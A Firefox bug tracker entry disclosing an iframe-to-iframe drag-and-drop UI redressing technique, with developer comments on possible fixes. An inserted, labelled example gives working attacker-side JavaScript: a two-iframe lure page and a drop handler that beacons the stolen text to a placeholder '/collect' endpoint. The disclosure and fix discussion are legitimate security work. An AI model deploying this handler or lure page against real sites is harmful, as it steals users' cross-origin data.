Bug 822215 - iframe-to-iframe cross-domain extraction method (UI Redressing)
Opened 11 years ago, updated 1 year ago
Product / Component: Core :: DOM: Copy & Paste and Drag & Drop (defect)
Status: NEW
Reporter: luca.defulgentis; Assignee: Unassigned
Keywords: csectype-spoof, sec-moderate
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0
Build ID: 20121128204232

Steps to reproduce:

Hi Folks,

I found a new cross-domain content extraction method that could be used to exploit UI Redressing issues under Firefox.

The extraction method is extremely simple: instead of performing a drag&drop action of sensitive data from a framed vulnerable web page to the framing one (attacker-controlled), the victim is induced to navigate to a malicious HTML page that includes two iframes: the former frames the vulnerable page, where the sensitive content resides, while the latter frames another attacker's page that is used to drop the extracted content.

Firefox is not able to block this kind of attack because no check on cross-domain drag&drop between iframes is performed. The (iframe-to-iframe) method was tested against the latest version of Firefox.

Further details can be found here: blog.nibblesec.org

Thanks,
Luca
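The attacker-side pieces of the setup the report describes, written out as an added example (this is not code from the report or from the linked blog post). It builds the outer page with two sibling iframes and shows the drop handler the second frame would run; the URLs, the `/collect` endpoint and the `makeDropEvent` stand-in for a real DragEvent are placeholders so the handler can be exercised outside a browser. The whole technique depends on the victim page being frameable at all; a page that refuses framing (X-Frame-Options, or a CSP `frame-ancestors` directive) never ends up in the first iframe.

```javascript
// Added example: attacker-side components of the iframe-to-iframe drag-and-drop
// extraction described in bug 822215. Not the reporter's code; URLs and the
// collection endpoint are placeholders.

// Outer (attacker-controlled) page: two sibling iframes under one top-level
// document. The first frames the victim page holding the sensitive text, the
// second frames the attacker's drop target. In the affected Firefox builds no
// check prevented a drag that started in the first frame from being dropped
// into the second.
function buildOuterPage(victimUrl, dropUrl) {
  return [
    '<!doctype html>',
    '<title>Drag the highlighted text into the box below</title>',
    `<iframe id="victim" src="${victimUrl}" width="600" height="300"></iframe>`,
    `<iframe id="sink" src="${dropUrl}" width="600" height="100"></iframe>`,
  ].join('\n');
}

// Drop handler for the attacker's drop-target frame. Reads whatever the
// browser put in the DataTransfer for the dragged selection and returns it;
// the caller decides what to do with it.
function handleDrop(event) {
  event.preventDefault(); // default action would navigate to the dropped text/URL
  const dt = event.dataTransfer;
  const types = Array.from(dt.types || []);
  return {
    text: types.includes('text/plain') ? dt.getData('text/plain') : '',
    html: types.includes('text/html') ? dt.getData('text/html') : '',
  };
}

// Minimal stand-in for a DragEvent (constructed for offline testing only).
// `items` maps MIME type -> payload, mirroring DataTransfer.getData().
function makeDropEvent(items) {
  let prevented = false;
  return {
    dataTransfer: {
      types: Object.keys(items),
      getData: (type) => items[type] ?? '',
    },
    preventDefault: () => { prevented = true; },
    get defaultPrevented() { return prevented; },
  };
}

// In a real browser (script placed at the end of the drop page's body):
// a drop zone only receives 'drop' if 'dragover' cancels its default action.
if (typeof document !== 'undefined') {
  const zone = document.body;
  zone.addEventListener('dragover', (e) => e.preventDefault());
  zone.addEventListener('drop', (e) => {
    const stolen = handleDrop(e);
    // Placeholder exfiltration: image beacon to the attacker's own origin.
    new Image().src = '/collect?d=' + encodeURIComponent(JSON.stringify(stolen));
  });
}
```

The `dragover` cancellation is the detail that most often trips people up when reproducing drag-and-drop UI redressing: without it the browser never fires `drop` on the target, regardless of any cross-origin policy.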
Updated 11 years ago
Component: Untriaged → Security

Updated 11 years ago
Status: UNCONFIRMED → NEW
Component: Security → Drag and Drop
Ever confirmed: true
Keywords: csec-ui-redress, sec-moderate
Product: Firefox → Core
Comment 1 (11 years ago)
As noted at http://blog.nibblesec.org/2012/12/ui-redressing-mayhem-firefox-0day-and.html dragging from a frame to a cross-origin parent was blocked by the fix in bug 605991. It could be we don't want to address the drag and drop aspect of this--I bet it breaks a lot of things--but instead kill support for view-source: in anything but a top-level window/tab. I'm sure that will break things too (it'll break one of my old bookmarklets, for example) but since they will be Gecko-only things it's more defensible.
See Also: → 605991
Comment 2 (11 years ago)
In addition to the nibblesec blog this was referenced at the end of a recent ThreatPost article, http://threatpost.com/en_us/blogs/chrome-clickjacking-vulnerability-could-expose-user-information-google-amazon-010213
Comment 3 (11 years ago)
Disabling "view-source:" for iframes won't really solve this, because plenty of sensitive data is shown as text. Sounds to me like we just need to complete the fix for bug 605991, so it also applies to iframe-to-iframe dragging.
Comment 5 (11 years ago)
So the idea is to block dragging from a content frame to another content frame within the same toplevel parent?
Flags: needinfo?(enndeakin)
Comment 6 (11 years ago)
Sounds like so. It is strict, but how else could this be resolved?
Updated 2 years ago
Severity: normal → S3